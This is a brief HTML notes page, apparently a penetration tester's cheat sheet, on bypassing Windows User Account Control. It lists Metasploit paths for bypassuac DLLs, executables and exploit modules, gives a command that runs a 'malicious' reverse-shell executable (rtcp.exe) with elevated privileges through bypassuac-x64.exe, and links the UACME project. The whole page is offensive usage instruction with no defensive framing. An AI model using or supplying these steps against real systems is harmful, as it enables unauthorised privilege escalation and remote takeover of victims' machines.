<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Bypass-UAC</title>
</head><body>bypass UAC<br/>
<br/>
Locations of files <br/>
<br/>
/usr/share/metasploit-framework/data/post/bypassuac-x64.dll<br/>
/usr/share/metasploit-framework/data/post/bypassuac-x64.exe<br/>
/usr/share/metasploit-framework/data/post/bypassuac-x86.dll<br/>
/usr/share/metasploit-framework/data/post/bypassuac-x86.exe<br/>
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac.rb<br/>
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_injection.rb<br/>
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_vbs.rb<br/>
<br/>
usage<br/>
<br/>
with the exe file you can do the following, to execute a malicious exe reverse shell or something<br/>
<br/>
bypassuac-x64.exe /c C:\users\els\desktop\rtcp.exe<br/>
<br/>
bypassuac is the file -- /c is the argument -- rtcp.exe is the malicious shell<br/>
<br/>
https://github.com/hfiref0x/UACME</body></html>